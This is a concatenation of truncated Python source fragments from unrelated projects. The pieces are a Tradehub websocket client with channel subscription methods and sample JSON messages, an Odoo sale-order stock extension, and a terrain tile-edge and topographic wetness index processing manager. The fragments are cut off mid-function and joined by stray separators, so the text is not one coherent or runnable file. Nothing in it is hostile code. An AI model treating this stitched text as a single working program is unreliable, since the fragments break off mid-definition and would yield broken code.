:param uri: Websocket URI, starting with 'ws://' or 'wss://' e.g. 'ws://192.168.127.12:5000/ws'
:param ping_interval: Interval for pinging the server in seconds.
:param ping_timeout: Time after no response for pings are considered as timeout in seconds.
"""
self._uri: str = uri
self._ping_interval: int = ping_interval
self._ping_timeout: int = ping_timeout
self._websocket: Optional[websockets.WebSocketClientProtocol] = None
async def subscribe(self, message_id: str, channels: List[str]):
"""
Subscribe to one or many channels.
:param message_id: Identifier that will be included in the websocket message response to allow the subscriber to
identify which channel the notification is originated from.
:param channels: List with channels to join.
:return: None
"""
await self.send({
"id": message_id,
"method": "subscribe",
"params": {"channels": channels}
})
async def unsubscribe(self, message_id: str, channels: List[str]):
"""
Unsubscribe to one or many channels.
:param message_id: Identifier that will be included in the websocket message response to allow the subscriber to
identify which channel the notification is originated from.
:param channels: List with channels to leave.
:return: None
"""
await self.send({
"id": message_id,
"method": "unsubscribe",
"params": {"channels": channels}
})
async def subscribe_leverages(self, message_id: str, swth_address: str):
"""
Subscribe to wallet specific leverages channel.
.. warning::
This channel has not been tested yet.
:param message_id: Identifier that will be included in the websocket message response to allow the subscriber to
identify which channel the notification is originated from.
:param swth_address: Tradehub wallet address starting with 'swth1' for mainnet and 'tswth1' for testnet.
:return: None
"""
# TODO not tested yet
channel_name: str = f"leverages.{swth_address}"
await self.subscribe(message_id, [channel_name])
async def subscribe_market_stats(self, message_id: str):
"""
Subscribe to market stats.
Example::
ws_client.subscribe_market_stats('market_stats')
The initial channel message is expected as::
{
'id':'market_stats',
'result': ['market_stats']
}
The subscription and channel messages are expected as follow::
{
'channel': 'market_stats',
'sequence_number': 484,
'result': {
'cel1_usdc1': {
'day_high': '5.97',
'day_low': '5.72',
'day_open': '5.86',
'day_close': '5.74',
'day_volume': '414.4',
'day_quote_volume': '2429.009',
'index_price': '0',
'mark_price': '0',
'last_price': '5.74',
'market': 'cel1_usdc1',
'market_type': 'spot',
'open_interest': '0'
}
...
}
}
:param message_id: Identifier that will be included in the websocket message response to allow the subscriber to
identify which channel the notification is originated from.
:return: None
"""
channel_name: str = "market_stats"
await self.subscribe(message_id, [channel_name])
async def subscribe_books(self, message_id: str, market: str):
"""
Subscribe to book channel.
Example::
ws_client.subscribe_books('orderbook', "swth_eth1')
The initial channel message is expected as::
{
'id':'orderbook',
'result': ['books.eth1_usdc1', ...]
}
The initial subscription message is expected as::
{
'channel': 'books.eth1_usdc1',
'sequence_number': 924,
'result': [
{
'market': 'eth1_usdc1',
'price': '1797.1',
'quantity': '0.02',
'side': 'sell',
'type': 'new'
},
...
{
'market': 'eth1_usdc1',
'price': '1790.1',
'quantity': '0.02',
'side': 'buy',
'type': 'new'
}
...
]
}
The channel update messages are expected as::
{
'channel': 'books.eth1_usdc1',
'sequence_number': 924,
'result': [
{
'market': 'eth1_usdc1',
'price': '1797.1',
'quantity': '0',
'side': 'sell',
'type': 'delete'
},
...
{
'market':'eth1_usdc1',
'price': '1800.18',
'quantity': '-0.43',
'side': 'sell',
'type': 'update'
},
...
{
'market': 'eth1_usdc1',
'price': '1114.48',
'quantity': '182.716',
'side': 'buy',
'type': 'new'
}
]
}
.. note::
The initial message is a snapshot of the current orderbook. The following messages are delta messages to the
snapshot. Each message has a 'sequence_number'.
Updates can contain update types: 'new', 'update' or 'delete'. The quantity in a 'update' message can be
negative indicating a reduction, while positive value means an increment.
All updates need to be processed in the provided order to maintain an consistent orderbook.
.. warning::
The initial snapshot is a partial orderbook with a total of 100 entries!
Expect receiving updates for orders outside the local managed orderbook.
Ignore or reconnect to maintain the local orderbook.
:param message_id: Identifier that will be included in the websocket message response to allow the subscriber to
identify which channel the notification is originated from.
:param market: Tradehub market identifier, e.g. 'swth_eth1'
:return: None
"""
channel_name: str = f"books.{market}"
await self.subscribe(message_id, [channel_name])
async def subscribe_orders(self, message_id: str, swth_address: str, market: Optional[str] = None):
"""
Subscribe to orders channel.
.. note::
The market identifier is optional and acts as a filter.
Example::
ws_client.subscribe_orders('orders', "swth1...abcd')
The initial channel message is expected as::
{
'id':'orders',
'result': ['orders.swth1...abcd']
}
The channel update messages are expected as::
{
'channel': 'orders.swth1...abcd',
'result': [
{
'order_id': '7CBBF51B75CF2E046726BB...56757D6D502B01F4BB62178DCF',
'block_height': 7375724,
'triggered_block_height': 0,
'address': 'swth1...abcd',
'market': 'eth1_wbtc1',
'side': 'sell',
'price': '0',
'quantity': '0.08',
'available': '0.08',
'filled': '0',
'order_status': 'pending',
'order_type': 'market',
'initiator': 'user',
'time_in_force': 'fok',
'stop_price': '0',
'trigger_type': '',
'allocated_margin_denom': 'eth1',
'allocated_margin_amount': '0',
'is_liquidation': False,
'is_post_only': False,
'is_reduce_only': False,
'type': 'new',
'block_created_at': '2021-02-11T20:36:02.244175356Z',
'username': '',
'id': ''
}
...
]
}
:param message_id: Identifier that will be included in the websocket message response to allow the subscriber to
identify which channel the notification is originated from.
:param swth_address: Tradehub wallet address starting with 'swth1' for mainnet and 'tswth1' for testnet.
:param market: Tradehub market identifier, e.g. 'swth_eth1'
:return: None
"""
if market:
channel_name: str = f"orders_by_market.{market}.{swth_address}"
else:
channel_name: str = f"orders.{swth_address}"
await self.subscribe(message_id, [channel_name])
async def subscribe_positions(self, message_id: str, swth_address: str, market: Optional[str] = None):
"""
Subscribe to positions channel.
.. note::
The market identifier is optional and acts as a filter.
.. warning::
This channel is not tested yet.
:param message_id: Identifier that will be included in the websocket message response to allow the subscriber to
identify which channel the notification is originated from.
:param swth_address: Tradehub wallet address starting with 'swth1' for mainnet and 'tswth1' for testnet.
:param market: Tradehub market identifier, e.g. 'swth_eth1'
:return: None
"""
# TODO not tested yet
if market:
channel_name: str = f"positions_by_market.{market}.{swth_address}"
else:
channel_name: str = f"positions.{swth_address}"
await self.subscribe(message_id, [channel_name])
async def subscribe_recent_trades(self, message_id: str, market: str):
"""
Subscribe to recent trades.
Example::
ws_client.subscribe_recent_trades('trades', "swth_eth1')
The initial channel message is expected as::
{
'id': 'trades',
'result': ['recent_trades.swth_eth1']
}
The channel update messages are expected as::
{
'channel': 'recent_trades.eth1_usdc1',
'sequence_number': 812,
'result': [
{
'id': '0',
'block_created_at': '2021-02-11T20:49:07.095418551Z',
'taker_id': '5FF349410F9CF59BED36D412D1223424835342274BC0E504ED0A17EE4B5B0856',
'taker_address': 'swth1vaavrkrm7usqg9hcwhqh2hev9m3nryw7aera8p',
'taker_fee_amount': '0.00002',
'taker_fee_denom': 'eth1',
'taker_side': 'buy',
'maker_id': '8334A9C97CAEFAF84774AAADB0D5666E7764BA023DF145C8AF90BB6A6862EA2E',
'maker_address': 'swth1wmcj8gmz4tszy5v8c0d9lxnmguqcdkw22275w5',
'maker_fee_amount': '-0.00001',
'maker_fee_denom': 'eth1',
'maker_side': 'sell',
'market': 'eth1_usdc1',
'price': '1797.1',
'quantity': '0.02',
'liquidation': '',
'taker_username': '',
'maker_username': '',
'block_height': '7376096'
},
...
]
}
.. warning::
The field 'id' is sometimes '0'. This endpoint/channel does not seem to work correct.
:param message_id: Identifier that will be included in the websocket message response to allow the subscriber to
identify which channel the notification is originated from.
:param market: Tradehub market identifier, e.g. 'swth_eth1'
:return: None
"""
channel_name: str = f"recent_trades.{market}"
await self.subscribe(message_id, [channel_name])
async def subscribe_account_trades(self, message_id: str, swth_address: str, market: Optional[str] = None):
"""
Subscribe to account trades.
Example::
ws_client.subscribe_account_trades('account', 'swth...abcd', 'eth1_usdc1')
# or for all markets
ws_client.subscribe_account_trades('account', "swth...abcd')
The initial channel message is expected as::
{
'id': 'account',
'result': ['account_trades_by_market.eth1_usdc1.swth1...abcd']
}
# or for all markets
{
'id': 'account',
'result': ['account_trades.swth1...abcd']
}
The channel update messages are expected as::
{
'channel': 'recent_trades.eth1_usdc1',
'sequence_number': 812,
'result': [
{
'id': '0',
'block_created_at': '2021-02-11T20:49:07.095418551Z',
'taker_id': '5FF349410F9CF59BED36D412D1223424835342274BC0E504ED0A17EE4B5B0856',
'taker_address': 'swth1...taker',
'taker_fee_amount': '0.00002',
'taker_fee_denom': 'eth1',
'taker_side': 'buy',
'maker_id': '8334A9C97CAEFAF84774AAADB0D5666E7764BA023DF145C8AF90BB6A6862EA2E',
'maker_address': 'swth1...maker',
'maker_fee_amount': '-0.00001',
'maker_fee_denom': 'eth1',
'maker_side': 'sell',
'market': 'eth1_usdc1',
'price': '1797.1',
'quantity': '0.02',
'liquidation': '',
'taker_username': '',
'maker_username': '',
'block_height': '7376096'
},
...
]
}
.. note::
The market identifier is optional and acts as a filter.
.. warning::
The field 'id' is '0' all the time. This endpoint/channel does not seem to work correct.
:param message_id: Identifier that will be included in the websocket message response to allow the subscriber to
identify which channel the notification is originated from.
:param swth_address: Tradehub wallet address starting with 'swth1' for mainnet and 'tswth1' for testnet.
:param market: Tradehub market identifier, | |
<gh_stars>0
# -*- coding: utf-8 -*-
# Part of Odoo. See LICENSE file for full copyright and licensing details.
import json
import logging
from datetime import datetime, timedelta
from collections import defaultdict
from odoo import api, fields, models, _
from odoo.tools import DEFAULT_SERVER_DATETIME_FORMAT, float_compare, float_round
from odoo.tools.float_utils import float_repr
from odoo.tools.misc import format_date
from odoo.exceptions import UserError
_logger = logging.getLogger(__name__)
class SaleOrder(models.Model):
_inherit = "sale.order"
@api.model
def _default_warehouse_id(self):
# !!! Any change to the default value may have to be repercuted
# on _init_column() below.
return self.env.user._get_default_warehouse_id()
incoterm = fields.Many2one(
'account.incoterms', 'Incoterm',
help="International Commercial Terms are a series of predefined commercial terms used in international transactions.")
picking_policy = fields.Selection([
('direct', 'As soon as possible'),
('one', 'When all products are ready')],
string='Shipping Policy', required=True, readonly=True, default='direct',
states={'draft': [('readonly', False)], 'sent': [('readonly', False)]}
,help="If you deliver all products at once, the delivery order will be scheduled based on the greatest "
"product lead time. Otherwise, it will be based on the shortest.")
warehouse_id = fields.Many2one(
'stock.warehouse', string='Warehouse',
required=True, readonly=True, states={'draft': [('readonly', False)], 'sent': [('readonly', False)]},
default=_default_warehouse_id, check_company=True)
picking_ids = fields.One2many('stock.picking', 'sale_id', string='Transfers')
delivery_count = fields.Integer(string='Delivery Orders', compute='_compute_picking_ids')
procurement_group_id = fields.Many2one('procurement.group', 'Procurement Group', copy=False)
effective_date = fields.Date("Effective Date", compute='_compute_effective_date', store=True, help="Completion date of the first delivery order.")
expected_date = fields.Datetime( help="Delivery date you can promise to the customer, computed from the minimum lead time of "
"the order lines in case of Service products. In case of shipping, the shipping policy of "
"the order will be taken into account to either use the minimum or maximum lead time of "
"the order lines.")
json_popover = fields.Char('JSON data for the popover widget', compute='_compute_json_popover')
show_json_popover = fields.Boolean('Has late picking', compute='_compute_json_popover')
def _init_column(self, column_name):
""" Ensure the default warehouse_id is correctly assigned
At column initialization, the ir.model.fields for res.users.property_warehouse_id isn't created,
which means trying to read the property field to get the default value will crash.
We therefore enforce the default here, without going through
the default function on the warehouse_id field.
"""
if column_name != "warehouse_id":
return super(SaleOrder, self)._init_column(column_name)
field = self._fields[column_name]
default = self.env['stock.warehouse'].search([('company_id', '=', self.env.company.id)], limit=1)
value = field.convert_to_write(default, self)
value = field.convert_to_column(value, self)
if value is not None:
_logger.debug("Table '%s': setting default value of new column %s to %r",
self._table, column_name, value)
query = 'UPDATE "%s" SET "%s"=%s WHERE "%s" IS NULL' % (
self._table, column_name, field.column_format, column_name)
self._cr.execute(query, (value,))
@api.depends('picking_ids.date_done')
def _compute_effective_date(self):
for order in self:
pickings = order.picking_ids.filtered(lambda x: x.state == 'done' and x.location_dest_id.usage == 'customer')
dates_list = [date for date in pickings.mapped('date_done') if date]
order.effective_date = min(dates_list).date() if dates_list else False
@api.depends('picking_policy')
def _compute_expected_date(self):
super(SaleOrder, self)._compute_expected_date()
for order in self:
dates_list = []
for line in order.order_line.filtered(lambda x: x.state != 'cancel' and not x._is_delivery() and not x.display_type):
dt = line._expected_date()
dates_list.append(dt)
if dates_list:
expected_date = min(dates_list) if order.picking_policy == 'direct' else max(dates_list)
order.expected_date = fields.Datetime.to_string(expected_date)
@api.model
def create(self, vals):
if 'warehouse_id' not in vals and 'company_id' in vals:
user = self.env['res.users'].browse(vals.get('user_id', False))
vals['warehouse_id'] = user.with_company(vals.get('company_id'))._get_default_warehouse_id().id
return super().create(vals)
def write(self, values):
if values.get('order_line') and self.state == 'sale':
for order in self:
pre_order_line_qty = {order_line: order_line.product_uom_qty for order_line in order.mapped('order_line') if not order_line.is_expense}
if values.get('partner_shipping_id'):
new_partner = self.env['res.partner'].browse(values.get('partner_shipping_id'))
for record in self:
picking = record.mapped('picking_ids').filtered(lambda x: x.state not in ('done', 'cancel'))
addresses = (record.partner_shipping_id.display_name, new_partner.display_name)
message = _("""The delivery address has been changed on the Sales Order<br/>
From <strong>"%s"</strong> To <strong>"%s"</strong>,
You should probably update the partner on this document.""") % addresses
picking.activity_schedule('mail.mail_activity_data_warning', note=message, user_id=self.env.user.id)
if values.get('commitment_date'):
# protagate commitment_date as the deadline of the related stock move.
# TODO: Log a note on each down document
self.order_line.move_ids.date_deadline = fields.Datetime.to_datetime(values.get('commitment_date'))
res = super(SaleOrder, self).write(values)
if values.get('order_line') and self.state == 'sale':
for order in self:
to_log = {}
for order_line in order.order_line:
if float_compare(order_line.product_uom_qty, pre_order_line_qty.get(order_line, 0.0), order_line.product_uom.rounding) < 0:
to_log[order_line] = (order_line.product_uom_qty, pre_order_line_qty.get(order_line, 0.0))
if to_log:
documents = self.env['stock.picking']._log_activity_get_documents(to_log, 'move_ids', 'UP')
documents = {k:v for k, v in documents.items() if k[0].state != 'cancel'}
order._log_decrease_ordered_quantity(documents)
return res
def _compute_json_popover(self):
for order in self:
late_stock_picking = order.picking_ids.filtered(lambda p: p.delay_alert_date)
order.json_popover = json.dumps({
'popoverTemplate': 'sale_stock.DelayAlertWidget',
'late_elements': [{
'id': late_move.id,
'name': late_move.display_name,
'model': 'stock.picking',
} for late_move in late_stock_picking
]
})
order.show_json_popover = bool(late_stock_picking)
def _action_confirm(self):
self.order_line._action_launch_stock_rule()
return super(SaleOrder, self)._action_confirm()
@api.depends('picking_ids')
def _compute_picking_ids(self):
for order in self:
order.delivery_count = len(order.picking_ids)
@api.onchange('company_id')
def _onchange_company_id(self):
if self.company_id:
warehouse_id = self.env['ir.default'].get_model_defaults('sale.order').get('warehouse_id')
self.warehouse_id = warehouse_id or self.user_id.with_company(self.company_id.id)._get_default_warehouse_id().id
@api.onchange('user_id')
def onchange_user_id(self):
super().onchange_user_id()
self.warehouse_id = self.user_id.with_company(self.company_id.id)._get_default_warehouse_id().id
@api.onchange('partner_shipping_id')
def _onchange_partner_shipping_id(self):
res = {}
pickings = self.picking_ids.filtered(
lambda p: p.state not in ['done', 'cancel'] and p.partner_id != self.partner_shipping_id
)
if pickings:
res['warning'] = {
'title': _('Warning!'),
'message': _(
'Do not forget to change the partner on the following delivery orders: %s'
) % (','.join(pickings.mapped('name')))
}
return res
def action_view_delivery(self):
'''
This function returns an action that display existing delivery orders
of given sales order ids. It can either be a in a list or in a form
view, if there is only one delivery order to show.
'''
action = self.env["ir.actions.actions"]._for_xml_id("stock.action_picking_tree_all")
pickings = self.mapped('picking_ids')
if len(pickings) > 1:
action['domain'] = [('id', 'in', pickings.ids)]
elif pickings:
form_view = [(self.env.ref('stock.view_picking_form').id, 'form')]
if 'views' in action:
action['views'] = form_view + [(state,view) for state,view in action['views'] if view != 'form']
else:
action['views'] = form_view
action['res_id'] = pickings.id
# Prepare the context.
picking_id = pickings.filtered(lambda l: l.picking_type_id.code == 'outgoing')
if picking_id:
picking_id = picking_id[0]
else:
picking_id = pickings[0]
action['context'] = dict(self._context, default_partner_id=self.partner_id.id, default_picking_type_id=picking_id.picking_type_id.id, default_origin=self.name, default_group_id=picking_id.group_id.id)
return action
def action_cancel(self):
documents = None
for sale_order in self:
if sale_order.state == 'sale' and sale_order.order_line:
sale_order_lines_quantities = {order_line: (order_line.product_uom_qty, 0) for order_line in sale_order.order_line}
documents = self.env['stock.picking']._log_activity_get_documents(sale_order_lines_quantities, 'move_ids', 'UP')
self.picking_ids.filtered(lambda p: p.state != 'done').action_cancel()
if documents:
filtered_documents = {}
for (parent, responsible), rendering_context in documents.items():
if parent._name == 'stock.picking':
if parent.state == 'cancel':
continue
filtered_documents[(parent, responsible)] = rendering_context
self._log_decrease_ordered_quantity(filtered_documents, cancel=True)
return super(SaleOrder, self).action_cancel()
def _prepare_invoice(self):
invoice_vals = super(SaleOrder, self)._prepare_invoice()
invoice_vals['invoice_incoterm_id'] = self.incoterm.id
return invoice_vals
@api.model
def _get_customer_lead(self, product_tmpl_id):
super(SaleOrder, self)._get_customer_lead(product_tmpl_id)
return product_tmpl_id.sale_delay
def _log_decrease_ordered_quantity(self, documents, cancel=False):
def _render_note_exception_quantity_so(rendering_context):
order_exceptions, visited_moves = rendering_context
visited_moves = list(visited_moves)
visited_moves = self.env[visited_moves[0]._name].concat(*visited_moves)
order_line_ids = self.env['sale.order.line'].browse([order_line.id for order in order_exceptions.values() for order_line in order[0]])
sale_order_ids = order_line_ids.mapped('order_id')
impacted_pickings = visited_moves.filtered(lambda m: m.state not in ('done', 'cancel')).mapped('picking_id')
values = {
'sale_order_ids': sale_order_ids,
'order_exceptions': order_exceptions.values(),
'impacted_pickings': impacted_pickings,
'cancel': cancel
}
return self.env.ref('sale_stock.exception_on_so')._render(values=values)
self.env['stock.picking']._log_activity(_render_note_exception_quantity_so, documents)
def _show_cancel_wizard(self):
res = super(SaleOrder, self)._show_cancel_wizard()
for order in self:
if any(picking.state == 'done' for picking in order.picking_ids) and not order._context.get('disable_cancel_warning'):
return True
return res
class SaleOrderLine(models.Model):
_inherit = 'sale.order.line'
qty_delivered_method = fields.Selection(selection_add=[('stock_move', 'Stock Moves')])
product_packaging = fields.Many2one( 'product.packaging', string='Package', default=False, check_company=True)
route_id = fields.Many2one('stock.location.route', string='Route', domain=[('sale_selectable', '=', True)], ondelete='restrict', check_company=True)
move_ids = fields.One2many('stock.move', 'sale_line_id', string='Stock Moves')
product_type = fields.Selection(related='product_id.type')
virtual_available_at_date = fields.Float(compute='_compute_qty_at_date', digits='Product Unit of Measure')
scheduled_date = fields.Datetime(compute='_compute_qty_at_date')
forecast_expected_date = fields.Datetime(compute='_compute_qty_at_date')
free_qty_today = fields.Float(compute='_compute_qty_at_date', digits='Product Unit of Measure')
qty_available_today = fields.Float(compute='_compute_qty_at_date')
warehouse_id = fields.Many2one(related='order_id.warehouse_id')
qty_to_deliver = fields.Float(compute='_compute_qty_to_deliver', digits='Product Unit of Measure')
is_mto = fields.Boolean(compute='_compute_is_mto')
display_qty_widget = fields.Boolean(compute='_compute_qty_to_deliver')
@api.depends('product_type', 'product_uom_qty', 'qty_delivered', 'state', 'move_ids', 'product_uom')
def _compute_qty_to_deliver(self):
"""Compute the visibility of the inventory widget."""
for line in self:
line.qty_to_deliver = line.product_uom_qty - line.qty_delivered
if line.state in ('draft', 'sent', 'sale') and line.product_type == 'product' and line.product_uom and line.qty_to_deliver > 0:
if line.state == 'sale' and not line.move_ids:
line.display_qty_widget = False
else:
line.display_qty_widget = True
else:
line.display_qty_widget = False
@api.depends(
'product_id', 'customer_lead', 'product_uom_qty', 'product_uom', 'order_id.commitment_date',
'move_ids', 'move_ids.forecast_expected_date', 'move_ids.forecast_availability')
def _compute_qty_at_date(self):
""" Compute the quantity forecasted of product at delivery date. There are
two cases:
1. The quotation has a commitment_date, we take it as delivery date
2. The quotation hasn't commitment_date, we compute the estimated delivery
date based on lead time"""
treated = self.browse()
# If the state is already in sale the picking is created and a simple forecasted quantity isn't enough
# Then used the forecasted data of the related stock.move
for line in self.filtered(lambda l: l.state == 'sale'):
if not line.display_qty_widget:
continue
moves = line.move_ids.filtered(lambda m: m.product_id == line.product_id)
line.forecast_expected_date = max(moves.filtered("forecast_expected_date").mapped("forecast_expected_date"), default=False)
line.qty_available_today = 0
line.free_qty_today = 0
for move in moves:
line.qty_available_today += move.product_uom._compute_quantity(move.reserved_availability, line.product_uom)
| |
{'left': EdgeFile(fn, [slice(None), slice(0, 1)], save_path),
'right': EdgeFile(fn, [slice(None), slice(-1, None)], save_path),
'top': EdgeFile(fn, [slice(0, 1), slice(None)], save_path),
'bottom': EdgeFile(fn, [slice(-1, None), slice(None)], save_path)}
for fn in list(self.neighbors.keys())}
self.edges = edges
return edges
def fill_max_elevations(self):
max_elev = {}
for fn in list(self.edges.keys()):
elev_file = GdalReader(file_name=fn)
elev, = elev_file.raster_layers
max_elev[fn] = np.nanmax(elev.raster_data)
del elev_file # close file
del elev
self.max_elev = max_elev
def fill_percent_done(self):
percent_done = {}
for key, edge in self.edges.items():
for key1, ed in edge.items():
ed.update_metrics()
# ed.load_metrics()
percent_done[key] = np.array([edge[key2].percent_done
for key2 in list(edge.keys())])
percent_done[key] = percent_done[key].sum() \
/ ((percent_done[key] > 0).sum() + 1e-16)
self.percent_done = percent_done
def visualize_neighbors(self, neighbors=None):
if neighbors is None:
neighbors = self.neighbors
import matplotlib.pyplot as plt
coords = np.array([parse_fn(key) for key in list(neighbors.keys())])
n_coords = [np.array([parse_fn(neighbors[key][side])
for key in list(neighbors.keys())])
for side in ['left', 'right', 'top', 'bottom',
'top-right', 'top-left', 'bottom-right', 'bottom-left']]
top = 2
bot = 0
left = 1
right = 3
x = (coords[:, left] + coords[:, right]) / 2.0
y = (coords[:, top] + coords[:, bot]) / 2.0
n_x = [(n_coord[:, left] + n_coord[:, right]) / 2.0 - x
for n_coord in n_coords]
n_y = [(n_coord[:, top] + n_coord[:, bot]) / 2.0 - y
for n_coord in n_coords]
self.fill_percent_done()
colors = np.array([self.percent_done[key] for key in list(neighbors.keys())])
plt.scatter(x, y, c=colors, s=400, cmap='CMRmap_r')
plt.clim(0, 100)
plt.colorbar()
for coord in coords:
plt.plot([coord[left], coord[right], coord[right],
coord[left], coord[left]],
[coord[top], coord[top], coord[bot],
coord[bot], coord[top]])
for nx, ny in zip(n_x, n_y):
plt.quiver(x, y, nx, ny, angles='xy', scale_units='xy',
scale=1, width=0.005)
plt.xlim(coords[:, left].min(), coords[:, right].max())
plt.ylim(coords[:, bot].min(), coords[:, top].max())
count = 0
for key, edge in self.edges.items():
for side in ['left', 'right', 'top', 'bottom']:
ed = edge[side]
coordinates = ed.get_coordinates()
todo = ed.get('todo')
done = ed.get('done')
data = (ed.get('data') > 0)
y, x = coordinates.T
if side in ['left', 'top']:
plt.plot(x[todo & done & data], y[todo & done & data],
'bo', mec='b', mfc='none', mew=1,
label='could do (left/top)')
plt.plot(x[todo & ~done], y[todo & ~done], 'xr',
label='not done, could not do (left/top)')
plt.plot(x[~todo & done], y[~todo & done], '<g', mec='g',
label='done (left/top)')
else:
plt.plot(x[todo & done & data], y[todo & done & data],
'bs', mec='b', mfc='none', mew=1,
label='could do (right/bot)')
plt.plot(x[todo & ~done], y[todo & ~done], '+r',
label='not done, could not do (right/bot)')
plt.plot(x[~todo & done], y[~todo & done], '>g', mec='g',
label='done (right/bot)')
if count == 0:
plt.plot(x[0], y[0], 'bs', mec='b', mfc='none', mew=1,
label='could do (right/bot)')
plt.plot(x[0], y[0], '+r',
label='not done, could not do (right/bot)')
plt.plot(x[0], y[0], '>g', mec='g',
label='done (right/bot)')
plt.legend(loc=0)
count += 1
# clean up
del coordinates
del todo
del done
del data
def build_interpolator(self, dem_proc):
# Build an interpolator
gc = dem_proc.elev.grid_coordinates
# points = np.meshgrid(gc.x_axis, gc.y_axis)
# points = np.column_stack([pts.ravel() for pts in points])
# interp = spinterp.NearestNDInterpolator(points, dem_proc.data.ravel())
# interp = spinterp.LinearNDInterpolator(points, np.ravel(dem_proc.data),
# fill_value=np.nan)
interp = spinterp.interpolate.RegularGridInterpolator(
points=(gc.y_axis[::-1], gc.x_axis),
values=dem_proc.data[::-1, :].astype(float),
method='nearest', fill_value=np.nan, bounds_error=False)
return interp
def set_neighbor_data(self, elev_fn, dem_proc, interp=None):
"""
From the elevation filename, we can figure out and load the data and
done arrays.
"""
if interp is None:
interp = self.build_interpolator(dem_proc)
opp = {'top': 'bottom', 'left': 'right'}
for key in list(self.neighbors[elev_fn].keys()):
tile = self.neighbors[elev_fn][key]
if tile == '':
continue
oppkey = key
for me, neigh in opp.items():
if me in key:
oppkey = oppkey.replace(me, neigh)
else:
oppkey = oppkey.replace(neigh, me)
opp_edge = self.neighbors[tile][oppkey]
if opp_edge == '':
continue
interp.values = dem_proc.uca[::-1, :]
# interp.values[:, 0] = np.ravel(dem_proc.uca) # for other interp.
# for the top-left tile we have to set the bottom and right edges
# of that tile, so two edges for those tiles
for key_ed in oppkey.split('-'):
self.edges[tile][key_ed].set_data('data', interp)
interp.values = dem_proc.edge_done[::-1, :].astype(float)
# interp.values[:, 0] = np.ravel(dem_proc.edge_done)
for key_ed in oppkey.split('-'):
self.edges[tile][key_ed].set_data('done', interp)
def update_edge_todo(self, elev_fn, dem_proc):
"""
Can figure out how to update the todo based on the elev filename
"""
for key in list(self.edges[elev_fn].keys()):
self.edges[elev_fn][key].set_data('todo', data=dem_proc.edge_todo)
def update_edges(self, elev_fn, dem_proc):
"""
After finishing a calculation, this will update the neighbors and the
todo for that tile
"""
interp = self.build_interpolator(dem_proc)
self.update_edge_todo(elev_fn, dem_proc)
self.set_neighbor_data(elev_fn, dem_proc, interp)
def get_edge_init_data(self, fn, save_path=None):
"""
Creates the initialization data from the edge structure
"""
edge_init_data = {key: self.edges[fn][key].get('data') for key in
list(self.edges[fn].keys())}
edge_init_done = {key: self.edges[fn][key].get('done') for key in
list(self.edges[fn].keys())}
edge_init_todo = {key: self.edges[fn][key].get('todo') for key in
list(self.edges[fn].keys())}
return edge_init_data, edge_init_done, edge_init_todo
def find_best_candidate(self, elev_source_files=None):
"""
Heuristically determines which tile should be recalculated based on
updated edge information. Presently does not check if that tile is
locked, which could lead to a parallel thread closing while one thread
continues to process tiles.
"""
self.fill_percent_done()
i_b = np.argmax(list(self.percent_done.values()))
if list(self.percent_done.values())[i_b] <= 0:
return None
# check for ties
I = np.array(list(self.percent_done.values())) == \
list(self.percent_done.values())[i_b]
if I.sum() == 1:
pass # no ties
else:
I2 = np.argmax(np.array(list(self.max_elev.values()))[I])
i_b = I.nonzero()[0][I2]
# Make sure the apples are still apples
assert(np.array(list(self.max_elev.keys()))[I][I2]
== np.array(list(self.percent_done.keys()))[I][I2])
if elev_source_files is not None:
fn = list(self.percent_done.keys())[i_b]
lckfn = _get_lockfile_name(fn)
if os.path.exists(lckfn): # another process is working on it
# Find a different Candidate
i_alt = np.argsort(list(self.percent_done.values()))[::-1]
for i in i_alt:
fn = list(self.percent_done.keys())[i]
lckfn = _get_lockfile_name(fn)
if not os.path.exists(lckfn):
break
# Get and return the index
i_b = elev_source_files.index(fn)
return i_b
class ProcessManager(object):
"""
This assumes that the elevation has already been processed. That is,
pits have been removed.
"""
twi_status = []
elev_source_files = []
_INPUT_FILE_TYPES = ["tif", "tiff", "vrt", "hgt", 'flt', 'adf', 'grib',
'grib2', 'grb', 'gr1']
tile_edge = None
_DEBUG = False
def __init__(self, source_path='.', save_path='processed_data',
clean_tmp=True, use_cache=True, overwrite_cache=False):
"""
Processes elevation data inputs, and saves conditioned elevation and
the topographic wetness index.
Parameters
-----------
source_path: list/str (optional)
Default: current directory. Directory/location of elevation files.
save_path: str (optional)
Location where processed files will be saved. Default value is a
sub-directory to the source file path called 'processed_data'.
clean_tmp: bool (optional)
Default: True. When True, some temporary files and directories are
removed after calculation. If False, these are not removed.
use_cache: bool (optional)
Default: True. When True, this function looks in the expected
temporary file location and uses any intermediate files already
present
overwrite_cache: bool (optional)
Default: False. If this file already exists, it is not overwritten,
and no calculation is made. If True, any exisiting file will be
replaced
"""
self.source_path = source_path
self.save_path = save_path
self.overwrite_cache = overwrite_cache
self.clean_tmp = clean_tmp
self.elev_source_files = [os.path.join(source_path, fn)
for fn in os.listdir(source_path)
if os.path.splitext(fn)[-1].replace('.', '')
in self._INPUT_FILE_TYPES]
self.twi_status = ["Unknown" for sf in self.elev_source_files]
self.custom_status = ["Unknown" for sf in self.elev_source_files]
if not os.path.isdir(save_path):
os.makedirs(save_path)
subdirs = ['ang', 'mag', 'uca', 'twi', 'uca_edge_corrected', 'edge']
for subdir in subdirs:
if not os.path.isdir(os.path.join(save_path, subdir)):
os.makedirs(os.path.join(save_path, subdir))
def process_twi(self, index=None, do_edges=False, skip_uca_twi=False):
"""
Processes the TWI, along with any dependencies (like the slope and UCA)
Parameters
-----------
index : int/slice (optional)
Default: None - process all tiles in source directory. Otherwise,
will only process the index/indices of the files as listed in
self.elev_source_files
do_edges : bool (optional)
Default False. When false, the UCA will be calculated with
available edge information if the UCA was not previously computed.
If the UCA was previously computed and do_edges == False, the UCA
will not be updated. If do_edges == True, the UCA will also be
recalculated.
skip_uca_twi : bool (optional)
Skips the calculation of the UCA and TWI (only calculates the
magnitude and direction)
Notes
------
do_edges = False for the first round of the processing, but it is True
for the second round.
"""
if index is not None:
elev_source_files = [self.elev_source_files[index]]
else:
elev_source_files = self.elev_source_files
for i, esfile in enumerate(elev_source_files):
try:
fn, status = self.calculate_twi(esfile,
save_path=self.save_path,
do_edges=do_edges,
skip_uca_twi=skip_uca_twi)
if index is None:
self.twi_status[i] = status
else:
self.twi_status[index] = status
except:
lckfn = _get_lockfile_name(esfile)
try:
os.remove(lckfn)
except:
pass
traceback.print_exc()
print(traceback.format_exc())
if index is None:
self.twi_status[i] = "Error " + traceback.format_exc()
else:
self.twi_status[index] = "Error " + traceback.format_exc()
def process(self, index=None):
"""
This will completely process a directory of elevation tiles (as
supplied in the constructor). Both phases of the calculation, the
single tile | |
from __future__ import absolute_import
import logging
from copy import copy
import numpy as np
